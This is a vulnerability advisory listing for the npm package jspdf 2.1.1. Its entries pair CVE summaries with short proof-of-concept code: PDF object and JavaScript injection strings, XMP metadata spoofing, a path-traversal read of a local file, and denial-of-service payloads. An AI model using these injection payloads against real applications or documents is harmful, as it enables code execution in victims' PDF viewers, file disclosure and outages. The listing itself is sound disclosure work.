Search for packages
| purl | pkg:npm/jspdf@2.1.1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-2555-3wmg-bke6
Aliases: CVE-2026-24133 GHSA-95fx-jjr5-f39c |
jsPDF Vulnerable to Denial of Service (DoS) via Unvalidated BMP Dimensions in BMPDecoder User control of the first argument of the `addImage` method results in Denial of Service. If given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful BMP file that results in out of memory errors and denial of service. Harmful BMP files have large width and/or height entries in their headers, wich lead to excessive memory allocation. Other affected methods are: `html`. Example attack vector: ```js import { jsPDF } from "jspdf" // malicious BMP image data with large width/height headers const payload = ... const doc = new jsPDF(); doc.addImage(payload, "BMP", 0, 0, 100, 100); ``` |
Affected by 5 other vulnerabilities. |
|
VCID-4rm1-7nm2-7kfn
Aliases: CVE-2026-24737 GHSA-pqxr-3g65-p328 |
jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are: * `AcroformChoiceField.addOption` * `AcroformChoiceField.setOptions` * `AcroFormCheckBox.appearanceState` * `AcroFormRadioButton.appearanceState` Example attack vector: ```js import { jsPDF } from "jspdf" const doc = new jsPDF(); var choiceField = new doc.AcroFormChoiceField(); choiceField.T = "VulnerableField"; choiceField.x = 20; choiceField.y = 20; choiceField.width = 100; choiceField.height = 20; // PAYLOAD: // 1. Starts with "/" to bypass escaping. // 2. "dummy]" closes the array. // 3. "/AA" injects an Additional Action (Focus event). // 4. "/JS" executes arbitrary JavaScript. const payload = "/dummy] /AA << /Fo << /S /JavaScript /JS (app.alert('XSS')) >> >> /Garbage ["; choiceField.addOption(payload); doc.addField(choiceField); doc.save("test.pdf"); ``` |
Affected by 5 other vulnerabilities. |
|
VCID-5hnn-r83k-u3ba
Aliases: CVE-2026-25940 GHSA-p5xg-68wr-hm3m |
jsPDF has a PDF Injection in AcroForm module allows Arbitrary JavaScript Execution (RadioButton.createOption and "AS" property) User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to the following property, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim hovers over the radio option. * `AcroformChildClass.appearanceState` Example attack vector: ```js import { jsPDF } from "jspdf" const doc = new jsPDF(); const group = new doc.AcroFormRadioButton(); group.x = 10; group.y = 10; group.width = 20; group.height = 10; doc.addField(group); const child = group.createOption("opt1"); child.x = 10; child.y = 10; child.width = 20; child.height = 10; child.appearanceState = "Off /AA << /E << /S /JavaScript /JS (app.alert('XSS')) >> >>"; doc.save("test.pdf"); ``` |
Affected by 2 other vulnerabilities. |
|
VCID-6pvn-kfpj-e3g7
Aliases: CVE-2026-31898 GHSA-7x6v-j9x4-qf24 |
jspdf: jsPDF: Arbitrary code execution via unsanitized input in createAnnotation method |
Affected by 0 other vulnerabilities. |
|
VCID-e3uy-gm2d-w3bk
Aliases: CVE-2021-23353 GHSA-57f3-gghm-9mhc |
Improper Input Validation This affects the package jspdf ReDoS is possible via the `addImage` function. |
Affected by 12 other vulnerabilities. |
|
VCID-fdf6-8j56-qqc6
Aliases: CVE-2026-25535 GHSA-67pg-wm7f-q7fj |
jsPDF Affected by Client-Side/Server-Side Denial of Service via Malicious GIF Dimensions User control of the first argument of the `addImage` method results in denial of service. If given the possibility to pass unsanitized image data or URLs to the `addImage` method, a user can provide a harmful GIF file that results in out of memory errors and denial of service. Harmful GIF files have large width and/or height entries in their headers, wich lead to excessive memory allocation. Other affected methods are: `html`. Example attack vector: ```js import { jsPDF } from "jspdf" // malicious GIF image data with large width/height headers const payload = ... const doc = new jsPDF(); doc.addImage(payload, "GIF", 0, 0, 100, 100); ``` |
Affected by 2 other vulnerabilities. |
|
VCID-g47z-ehg3-vqbb
Aliases: CVE-2026-24043 GHSA-vm32-vv63-w422 |
jsPDF Vulnerable to Stored XMP Metadata Injection (Spoofing & Integrity Violation) User control of the first argument of the `addMetadata` function allows users to inject arbitrary XML. If given the possibility to pass unsanitized input to the `addMetadata` method, a user can inject arbitrary XMP metadata into the generated PDF. If the generated PDF is signed, stored or otherwise processed after, the integrity of the PDF can no longer be guaranteed. Example attack vector: ```js import { jsPDF } from "jspdf" const doc = new jsPDF() // Input a string that closes the current XML tag and opens a new one. // We are injecting a fake "dc:creator" (Author) to spoof the document source. const maliciousInput = '</jspdf:metadata></rdf:Description>' + '<rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/">' + '<dc:creator>TRUSTED_ADMINISTRATOR</dc:creator>' + // <--- Spoofed Identity '</rdf:Description>' + '<rdf:Description><jspdf:metadata>' // The application innocently adds the user's input to the metadata doc.addMetadata(maliciousInput, "http://valid.namespace") doc.save("test.pdf") ``` |
Affected by 5 other vulnerabilities. |
|
VCID-h1m4-jwms-tqee
Aliases: CVE-2026-31938 GHSA-wfv2-pwc8-crg5 |
jspdf: jsPDF: Cross site scripting via unsanitized output options |
Affected by 0 other vulnerabilities. |
|
VCID-hu3v-vhnb-kuhw
Aliases: CVE-2026-25755 GHSA-9vjf-qc39-jprp |
jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method User control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF. ```js import { jsPDF } from "jspdf"; const doc = new jsPDF(); // Payload: // 1. ) closes the JS string. // 2. > closes the current dictionary. // 3. /AA ... injects an "Additional Action" that executes on focus/open. const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>"; doc.addJS(maliciousPayload); doc.save("vulnerable.pdf"); ``` |
Affected by 2 other vulnerabilities. |
|
VCID-jcat-3b8h-c7hw
Aliases: CVE-2025-57810 GHSA-8mvj-3j78-4qmw |
jsPDF Denial of Service (DoS) User control of the first argument of the addImage method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image data or URLs to the addImage method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service. Other affected methods are: `html`. Example payload: ```js import { jsPDF } from "jspdf" const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154]) const doc = new jsPDF(); const startTime = performance.now(); try { doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW"); } finally { const endTime = performance.now(); console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`); } ``` |
Affected by 10 other vulnerabilities. |
|
VCID-t6gm-egg6-eua6
Aliases: CVE-2025-68428 GHSA-f8cm-6447-x5h2 |
jsPDF has Local File Inclusion/Path Traversal vulnerability User control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are: `addImage`, `html`, `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. Example attack vector: ```js import { jsPDF } from "./dist/jspdf.node.js"; const doc = new jsPDF(); doc.addImage("./secret.txt", "JPEG", 0, 0, 10, 10); doc.save("test.pdf"); // the generated PDF will contain the "secret.txt" file ``` |
Affected by 9 other vulnerabilities. |
|
VCID-wg74-rver-pqa7
Aliases: CVE-2026-24040 GHSA-cjw8-79x6-5cj4 |
jsPDF has Shared State Race Condition in addJS Plugin The addJS method in the jspdf Node.js build utilizes a shared module-scoped variable (text) to store JavaScript content. When used in a concurrent environment (e.g., a Node.js web server), this variable is shared across all requests. If multiple requests generate PDFs simultaneously, the JavaScript content intended for one user may be overwritten by a subsequent request before the document is generated. This results in Cross-User Data Leakage, where the PDF generated for User A contains the JavaScript payload (and any embedded sensitive data) intended for User B. Typically, this only affects server-side environments, although the same race conditions might occur if jsPDF runs client-side. ```js import { jsPDF } from "jspdf"; const docA = new jsPDF(); const docB = new jsPDF(); // 1. User A sets their script (stored in shared 'text' variable) docA.addJS('console.log("Secret A");'); // 2. User B sets their script (overwrites shared 'text' variable) docB.addJS('console.log("Secret B");'); // 3. User A saves their PDF (reads current 'text' variable) docA.save("userA.pdf"); // Result: userA.pdf contains "Secret B" instead of "Secret A" ``` |
Affected by 5 other vulnerabilities. |
|
VCID-xufv-a7d6-pbfa
Aliases: CVE-2025-29907 GHSA-w532-jxjh-hjhj |
jsPDF Bypass Regular Expression Denial of Service (ReDoS) User control of the first argument of the `addImage` method results in CPU utilization and denial of service. If given the possibility to pass unsanitized image urls to the `addImage` method, a user can provide a harmful data-url that results in high CPU utilization and denial of service. Other affected methods are: `html`, `addSvgAsImage`. Example payload: ```js import { jsPDF } from "jpsdf" |
Affected by 11 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||